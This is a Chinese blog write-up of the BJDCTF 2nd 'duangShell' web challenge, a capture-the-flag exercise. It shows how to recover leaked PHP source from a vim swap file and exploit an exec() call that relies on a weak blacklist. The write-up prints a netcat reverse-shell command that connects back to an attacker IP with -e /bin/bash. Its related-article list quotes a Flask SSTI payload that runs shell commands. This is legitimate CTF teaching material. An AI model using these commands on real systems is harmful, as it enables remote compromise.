[BJDCTF 2nd]duangShell

最新推荐文章于 2021-03-04 19:15:41 发布
最新推荐文章于 2021-03-04 19:15:41 发布
阅读量631 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/106133120
版权

知识点:

  • nc命令反弹shell

在这里插入图片描述

 

题目提示源码泄露,访问/.index.php.swp下载并修复源码

linux下对swp的修复命令
vim -r .index.php.swp

 

<?php

error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
}
else 
    {    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl))
        die('just girl');
    else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) 
    { 
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";    
    } 
    else {   exec($girl);        //duangShell~~~~    
    } 
}
?>

 

在buu新建一个小号,打开Basic Labs下的一台靶机,用于监听
监听命令
攻击机

nc -lvvp 4455

 

靶机上执行

nc 174.1.70.57 4455 -e /bin/bash

 

在这里插入图片描述

 

连接成功


在这里插入图片描述

 

最后找flag即可
在根目录下使用命令

find -name flag

find命令会比较慢,耐心等等就能找到了

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF [BJDCTF2nd_duangshell]
veinard_F的博客
08-05 446
打开题目后是 提示是swp文件泄露 payload .index.php.swp下载文件 拖到Linux上 用命令vi -r 加路径加文件 恢复文件 得到 (将文件拖到Linux上涉及到主机和虚拟机文件共享的问题,需要在虚拟机设置上安装Vmware tools。) 观察上述代码可以发现 ...
BJDCTF 2nd-WP
luoluopeach
03-23 714
Crypto 1.签到-y1ng 直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== flag:BJD{W3lc0me_T0_BJDCTF} 2.老文盲了 将文字转化为拼音可以知道文字就是flag flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝} 3.cat_flag ...
[BJDCTF 2nd]duangShell(swp源码泄露,反弹shell
qq_44657899的博客
05-17 781
做这道题之前还一直不知道反弹shell是怎么操作的,做完之后恍然大悟,刷题真香 首先题目中提示了.swp,应该是.swp源码泄露,然后试了试/index.php.swp毫无反应,看了wp之后才知道是/.index.php.swp。。。幸好不是比赛,不然简直被自己蠢死 然后下载下来,拖到kali里用命令vim -r index.php.swp恢复文件,源码: 看了看过滤,只过滤了cat,天真的我以为用tac就行了。。。结果事情远远没有这么简单,exec()函数是没有回显的,我还一直以为exec()和sys
BJD CTF 2nd web wp
0xdawn的博客
03-25 976
fake google 正好是前段时间学过的flask ssti,先给出payload name={{"".__class__.__mro__[1].__subclasses__()[81].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cd ../;cat flag").read()')}} 老样子,...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF 2nd–TARGZ
12-21
审题,tar没用,不需要爆破 下载附件得到tar.gz压缩包 查看16进制的时候发现是PK的头,对应的题目的提示tar不好使(就是不tar压缩的) ...发现可以解压但是得到的还是压缩包,继续重复操作… 当时我解了半小时(时间沉dedao...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Mastering Typescript 2nd Edition
03-17
Mastering Typescript 2nd Edition, 英文版, 含epub电子书。 作者:Nathan Rozentals, 2017. Typescript 主要用于支持Angualar2和其他的网页前端构架。
CTF-Pwn-[BJDCTF 2nd]diff
归子莫的博客
05-07 1361
CTF-Pwn-[BJDCTF 2nd]diff 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]diff 使用ssh远程连接Username: ctf Passwor...
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
qq_45521281的博客
04-06 2116
[BJDCTF 2nd]duangShell讲解 打开之后是这个样的 很明显,是swp备份文件泄露。 当你非正常关闭vim编辑器时(比如直接关闭终端或者电脑断电),会生成一个.swp文件,这个文件是一个临时交换文件,用来备份缓冲区中的内容。 意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。 例如,第一次产生的交换文件名...
(BUUCTF 2nd-Ctypto 老文盲了)
qq_45784859的博客
03-23 1921
BUUCTF 2nd-Ctypto 老文盲了题目思路 题目 里面是一个txt文件,内容为: 罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝 思路 由于做Ctypto题不久,看到这第一时间找这是什么加密方式,找了半天找到了与佛论禅加密中的字体和这个挺像的,然而这种加密需要“佛曰:”开头就放弃这种加密方式。 到现在才发现我还不知道这是什么字,又在网上找的了在线汉字转拼音。得到这些汉字的读音为: bì...
BUUCTF-Crypto-老文盲了+Alice与Bob题解
weixin_47869330的博客
12-11 1344
题目: 老文盲了 罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝 解题: 想了一下文字加密的,只记得与佛论禅,藏头诗,看文字字形里有没有某个特殊字 (如每个字里有‘口’)的算一组 想不出什么名堂,搜搜每个字念什么,在线文字转拼音 BJD{这就是flag直接交了吧} OK fine flag:flag{淛匶襫黼瀬鎶軄鶛驕鳓哵} Alice与Bob: 题目: 解题: 根据题目:在线分解质因数: 新的数为:101999966233 再进行32位md5加密: 结果即为flag:flag{d450209323
BJDCTF 2nd总结
rreally的博客
03-26 1398
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前三个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3118
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[BJDCTF2nd_duangshell]
m0_53314778的博客
03-04 177
知识点: nc命令反弹shell 进入题目: 首先题目中提示了.swp,应该是.swp源码泄露,然后试了试/index.php.swp毫无反应,看了wp之后才知道是/.index.php.swp。。。 访问http://xxx/.index.php.swp下载该文件 该文件产生的原因是:​使用vi编辑器打开文件时,会生成一个.文件名.swp的备份文件,防止意外退出等情况导致文件内容丢失。产生原因主要是管理员在web目录下修改代码文件,导致生成了.swp备份文件。 然后下载下来,拖到kali里用命令v
[BJDCTF 2nd]fake google
ChenZIDu的博客
03-28 1832
上周BJDCTF有一道ssti注入题,当时瞎猫碰上死耗子,给我撞过去了。对Python,平常也没有C++和java用的频繁,记录一下正常思路。顺便学习一下,以后遇到了不能光靠运气撞过去了= = 一些简单注入 {{config}}可以获取当前设置 {{self}} {{self.__dict__._TemplateReference__context.config}} 同样可以看到config ...
[BJDCTF 2nd]EasyAspDotNet
weixin_43610673的博客
03-25 513
知识点:ASP.NET VIEWSTATE反序列化、CVE-2020-0688、windows基础命令 Windows + ASP.NET编写的网站,知识盲区,特别记录一下 别的什么都没有,就这个按钮很可疑,F12看一下 感觉应该是文件包含,但不知道要包含什么,看wp得知web.config Web.config文件是一个XML文本文件,它用来储存ASP.NETWeb 应用程序的配置信息(如最常用...
Pro Puppet 2nd:开源系统配置管理指南
《Pro Puppet 2nd》是一本专注于介绍Puppet,一个开源的系统配置管理框架和技术工具集的英文原版书籍。该书主要针对IT专业人员,旨在帮助读者深入了解如何利用Puppet来管理和维护计算机系统的配置。全书共分为12章,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值